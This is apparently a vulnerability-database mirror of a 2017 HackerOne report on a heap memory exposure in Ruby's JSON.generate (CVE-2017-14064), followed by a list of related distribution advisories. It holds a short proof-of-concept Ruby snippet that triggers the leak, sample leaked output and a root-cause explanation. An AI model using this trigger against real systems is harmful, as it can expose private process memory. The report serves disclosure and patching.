Lucene search
AhmadsherifH1:209949HistoryMar 01, 2017 - 10:55 p.m.
Ruby: Arbitrary heap exposure in JSON.generate
2017-03-0122:55:39
ahmadsherif
hackerone.com
23
0.006 Low
EPSS
Percentile
78.6%
Running this snippet can expose arbitrary memory:
require 'json'
state = JSON.state.new
state.space = "\0" * 1024
puts JSON.generate({a: :b}, state)
{"a":
psych/handlers/recorder.rb
tensi0
reeze)
Gem::Specification.new do |s|
# to objects of the same type as the original delegate.
mydata/scm/git/ruby/dist/lib/ruby/2.5.0/json/ext.rb
pass the namP
See http://guides.rubygems.org/specification-reference/ for help
# # constant and class member data initialization...
"b"}
The issues lies in using strdup in generator.c, which will stop after encountering a NULL byte returning a pointer to zero length string, which is not the length stored in space_len. Eventually fbuffer_append will copy the length of the string (e.g. the 1024 above) into the generated buffer.
Simpler snippets like JSON.generate({foo: "bar"}, space: "\0" * 1024 suffer the same issue but for slightly different reason; as fstrndup is using memccpy which will, again, stop copying after encountering a NULL byte returning a pointer to zero length string.
Related
veracode
veracode
Buffer Overflow
2019-05-16 02:16:35
nvd
nvd
CVE-2017-14064
2017-08-31 17:29:00
alpinelinux
alpinelinux
CVE-2017-14064
2017-08-31 17:29:00
redhatcve
redhatcve
CVE-2017-14064
2017-09-01 09:18:32
prion
prion
Null pointer dereference
2017-08-31 17:29:00
osv
osv
CVE-2017-14064
2017-08-31 17:29:00
ruby1.9.1 - security update
2017-09-26 00:00:00
ruby2.3 - security update
2017-09-05 00:00:00
cvelist
cvelist
CVE-2017-14064
2017-08-31 17:00:00
ubuntucve
ubuntucve
CVE-2017-14064
2017-08-31 00:00:00
debiancve
debiancve
CVE-2017-14064
2017-08-31 17:29:00
nessus
nessus
Photon OS 1.0: Ruby PHSA-2017-0034
2019-02-07 00:00:00
Ubuntu 14.04 LTS / 16.04 LTS : Ruby vulnerabilities (USN-3528-1)
2018-01-11 00:00:00
cve
cve
CVE-2017-14064
2017-08-31 17:29:00
openvas
openvas
Ubuntu: Security Advisory (USN-3528-1)
2018-10-26 00:00:00
Mageia: Security Advisory (MGASA-2017-0371)
2022-01-28 00:00:00
Fedora Update for ruby FEDORA-2017-e136d63c99
2017-09-16 00:00:00
ubuntu
ubuntu
Ruby vulnerabilities
2018-01-10 00:00:00
Ruby vulnerabilities
2017-10-05 00:00:00
Ruby regression
2021-03-25 00:00:00
mageia
mageia
Updated ruby packages fix security vulnerabilities
2017-10-18 23:19:34
freebsd
freebsd
ruby -- multiple vulnerabilities
2017-09-14 00:00:00
gentoo
gentoo
Ruby: Multiple vulnerabilities
2017-10-18 00:00:00
fedora
fedora
[SECURITY] Fedora 25 Update: ruby-2.3.4-64.fc25
2017-09-16 03:24:34
debian
debian
[SECURITY] [DSA 3966-1] ruby2.3 security update
2017-09-05 20:17:58
[SECURITY] [DLA 1114-1] ruby1.9.1 security update
2017-09-26 21:16:53
[SECURITY] [DLA 1421-1] ruby2.1 security update
2018-07-14 06:28:37
redhat
redhat
(RHSA-2017:3485) Moderate: rh-ruby24-ruby security, bug fix, and enhancement update
2017-12-19 08:13:07
(RHSA-2018:0378) Important: ruby security update
2018-02-28 16:24:33
slackware
slackware
[slackware-security] ruby
2017-09-18 19:20:47
amazon
amazon
Medium: ruby24
2017-10-26 17:01:00
Medium: ruby22, ruby23
2017-10-02 17:01:00
centos
centos
ruby, rubygem, rubygems security update
2018-03-10 11:53:01
oraclelinux
oraclelinux
ruby security update
2018-02-28 00:00:00
ibm
ibm
Security Bulletin: Vulnerabilities in Ruby affect PowerKVM
2018-06-18 01:42:18
apple
apple
About the security content of macOS High Sierra 10.13.6, Security Update 2018-004 Sierra, Security Update 2018-004 El Capitan - Apple Support
2020-07-28 05:29:11
photon
photon